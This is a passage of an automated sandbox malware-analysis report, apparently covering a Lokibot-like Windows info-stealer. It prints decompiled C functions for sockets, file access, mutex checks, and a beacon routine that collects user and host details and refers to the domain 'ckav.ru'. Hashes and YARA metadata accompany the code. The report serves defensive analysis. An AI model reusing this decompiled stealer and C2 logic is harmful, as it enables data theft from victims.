                                              • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                              0x004061c3
                                              0x004061cb
                                              0x004061cd
                                              0x004061d0
                                              0x004061de
                                              0x004061e0
                                              0x004061e5
                                              0x004061e9
                                              0x004061eb
                                              0x004061ed
                                              0x004061f2
                                              0x0040622a
                                              0x00406230
                                              0x00406235
                                              0x00406239
                                              0x0040623b
                                              0x00406244
                                              0x00406249
                                              0x00406249
                                              0x0040624c
                                              0x00406253
                                              0x00406256
                                              0x00406258
                                              0x00406261
                                              0x00406266
                                              0x00406266
                                              0x00406270
                                              0x00406273
                                              0x00406276
                                              0x0040627b
                                              0x0040627e
                                              0x0040628c
                                              0x0040628e
                                              0x00406290
                                              0x00406295
                                              0x0040629a
                                              0x0040629e
                                              0x004062a0
                                              0x004062ac
                                              0x004062af
                                              0x004062b7
                                              0x004062b9
                                              0x004062c9
                                              0x004062e0
                                              0x004062e2
                                              0x004062e4
                                              0x004062f3
                                              0x004062f3
                                              0x004062e4
                                              0x004062f8
                                              0x004062fd
                                              0x004062a0
                                              0x004062fe
                                              0x00406302
                                              0x00406307
                                              0x0040630c
                                              0x0040630d
                                              0x0040630f
                                              0x00406312
                                              0x00406317
                                              0x00406318
                                              0x0040631c
                                              0x0040631e
                                              0x00406321
                                              0x00406326
                                              0x00000000
                                              0x00406327
                                              0x004061f4
                                              0x004061ff
                                              0x00406208
                                              0x00406218
                                              0x0040621d
                                              0x00406224
                                              0x00406226
                                              0x00406228
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406228
                                              0x00406201
                                              0x00000000

                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                              • _wmemset.LIBCMT ref: 00406244
                                              • _wmemset.LIBCMT ref: 00406261
                                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: _wmemset$ErrorInformationLastToken
                                              • String ID: IDA$IDA
                                              • API String ID: 487585393-2020647798
                                              • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                              • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                              0x00404e1d
                                              0x00404e26
                                              0x00404e2a
                                              0x00404e2f
                                              0x00404e37
                                              0x00404e3a
                                              0x00404e45
                                              0x00404e4f
                                              0x00404e57
                                              0x00404e61
                                              0x00404e66
                                              0x00404e68
                                              0x00404e6c
                                              0x00404e6e
                                              0x00404e7a
                                              0x00404e80
                                              0x00404e84
                                              0x00404e9f
                                              0x00404ea7
                                              0x00404eab
                                              0x00404eb1
                                              0x00404eb1
                                              0x00404eb6
                                              0x00404ebe
                                              0x00404ecb
                                              0x00000000
                                              0x00404ec0
                                              0x00404ec1
                                              0x00404ec7
                                              0x00404ec7
                                              0x00404ecd
                                              0x00000000
                                              0x00404ece
                                              0x00404ebe
                                              0x00404e87
                                              0x00404e90
                                              0x00000000
                                              0x00404e90
                                              0x00000000

                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                              • socket.WS2_32(?,?,?), ref: 00404E7A
                                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: freeaddrinfogetaddrinfosocket
                                              • String ID:
                                              • API String ID: 2479546573-0
                                              • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                              • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                              0x004040c4
                                              0x004040ce
                                              0x004040d0
                                              0x004040e8
                                              0x004040ea
                                              0x004040ec
                                              0x004040f2
                                              0x0040418d
                                              0x00404190
                                              0x00404184
                                              0x00000000
                                              0x00404184
                                              0x004041a0
                                              0x004041a5
                                              0x004041a7
                                              0x00000000
                                              0x00000000
                                              0x004041a9
                                              0x004041b6
                                              0x004041b8
                                              0x004041be
                                              0x004041cb
                                              0x004041d0
                                              0x004041d1
                                              0x004041d3
                                              0x004041d8
                                              0x004041dc
                                              0x00000000
                                              0x004041e2
                                              0x00404100
                                              0x0040410c
                                              0x00404111
                                              0x0040417a
                                              0x0040417a
                                              0x00000000
                                              0x0040411b
                                              0x0040411b
                                              0x00404120
                                              0x00404122
                                              0x00404122
                                              0x0040412c
                                              0x0040413a
                                              0x0040413c
                                              0x00404140
                                              0x00000000
                                              0x00404142
                                              0x0040414a
                                              0x00404155
                                              0x0040415a
                                              0x0040415e
                                              0x00404168
                                              0x00404174
                                              0x00404176
                                              0x00404176
                                              0x0040417d
                                              0x0040417e
                                              0x00000000
                                              0x00404183
                                              0x00404140

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$AllocCreateReadVirtual
                                              • String ID: .tmp
                                              • API String ID: 3585551309-2986845003
                                              • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                              • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                              0x0041386f
                                              0x0041387e
                                              0x00413885
                                              0x00413889
                                              0x0041388c
                                              0x00413890
                                              0x00413893
                                              0x00413897
                                              0x0041389a
                                              0x0041389e
                                              0x004138a1
                                              0x004138a5
                                              0x004138a8
                                              0x004138ac
                                              0x004138af
                                              0x004138b2
                                              0x004138b5
                                              0x004138b8
                                              0x004138bb
                                              0x004138bc
                                              0x004138c4
                                              0x004138c8
                                              0x004138cb
                                              0x004138cf
                                              0x004138d2
                                              0x004138d6
                                              0x004138d7
                                              0x004138df
                                              0x004138e3
                                              0x004138e4
                                              0x004138ea
                                              0x004138eb
                                              0x004138f1
                                              0x004138f5
                                              0x004138f9
                                              0x004138fd
                                              0x00413901
                                              0x00413905
                                              0x00413909
                                              0x0041390d
                                              0x00413911
                                              0x00413915
                                              0x00413919
                                              0x0041391d
                                              0x00413921
                                              0x00413925
                                              0x00413929
                                              0x0041392d
                                              0x00413931
                                              0x00413935
                                              0x00413939
                                              0x0041393d
                                              0x00413941
                                              0x00413950
                                              0x00413959
                                              0x0041395f
                                              0x00413968
                                              0x0041396e
                                              0x00413973
                                              0x00413977
                                              0x00413979
                                              0x00413980
                                              0x00413982
                                              0x00413991
                                              0x0041399c
                                              0x0041399e
                                              0x004139a4
                                              0x004139a9
                                              0x004139ac
                                              0x004139b1
                                              0x004139b1
                                              0x004139b2
                                              0x004139b7
                                              0x004139bc
                                              0x004139c1
                                              0x004139c7
                                              0x004139cd
                                              0x004139cd
                                              0x004139db

                                              APIs
                                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                              • GetLastError.KERNEL32 ref: 0041399E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Error$CreateLastModeMutex
                                              • String ID:
                                              • API String ID: 3448925889-0
                                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                              0x004042cf
                                              0x004042d5
                                              0x004042df
                                              0x004042e2
                                              0x004042f9
                                              0x004042fb
                                              0x00404300
                                              0x0040430a
                                              0x00404314
                                              0x00404319
                                              0x00404323
                                              0x00404334
                                              0x0040433b
                                              0x0040433b
                                              0x0040433f
                                              0x00404344
                                              0x0040434c

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 3672724799-0
                                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 34%
                                              			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                              0x00412d31
                                              0x00412d34
                                              0x00412d39
                                              0x00412d3c
                                              0x00412d49
                                              0x00412d50
                                              0x00412d52
                                              0x00412f24
                                              0x00412f24
                                              0x00412f2b
                                              0x00412f30
                                              0x00412f32
                                              0x00412f37
                                              0x00412f41
                                              0x00412f53
                                              0x00412f53
                                              0x00412f5b
                                              0x00412f60
                                              0x00412d58
                                              0x00412d58
                                              0x00412d63
                                              0x00412d6c
                                              0x00412d73
                                              0x00412d7e
                                              0x00412d7f
                                              0x00412d80
                                              0x00412d81
                                              0x00412d82
                                              0x00412d8f
                                              0x00412da1
                                              0x00412da6
                                              0x00412dae
                                              0x00412db0
                                              0x00412db1
                                              0x00412db5
                                              0x00412dce
                                              0x00412dcf
                                              0x00412dd5
                                              0x00412dda
                                              0x00412db7
                                              0x00412db7
                                              0x00412db8
                                              0x00412dbe
                                              0x00412dc4
                                              0x00412dc9
                                              0x00412dc9
                                              0x00412de2
                                              0x00412de4
                                              0x00412de5
                                              0x00412de7
                                              0x00412de9
                                              0x00412e02
                                              0x00412e03
                                              0x00412e09
                                              0x00412e0e
                                              0x00412deb
                                              0x00412deb
                                              0x00412dec
                                              0x00412df2
                                              0x00412df8
                                              0x00412dfd
                                              0x00412dfd
                                              0x00412e11
                                              0x00412e17
                                              0x00412e19
                                              0x00412e1a
                                              0x00412e1e
                                              0x00412e37
                                              0x00412e38
                                              0x00412e3e
                                              0x00412e43
                                              0x00412e20
                                              0x00412e20
                                              0x00412e21
                                              0x00412e27
                                              0x00412e2d
                                              0x00412e32
                                              0x00412e32
                                              0x00412e4b
                                              0x00412e4d
                                              0x00412e4f
                                              0x00412e7e
                                              0x00412e8a
                                              0x00412e8f
                                              0x00412e51
                                              0x00412e59
                                              0x00412e67
                                              0x00412e6d
                                              0x00412e72
                                              0x00412e72
                                              0x00412e9e
                                              0x00412eaf
                                              0x00412eb4
                                              0x00412ec0
                                              0x00412ece
                                              0x00412edc
                                              0x00412eea
                                              0x00412ef8
                                              0x00412f0f
                                              0x00412f14
                                              0x00412f14
                                              0x00412f17
                                              0x00412f1d
                                              0x00412f1f
                                              0x00000000
                                              0x00412f1f
                                              0x00412f74

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
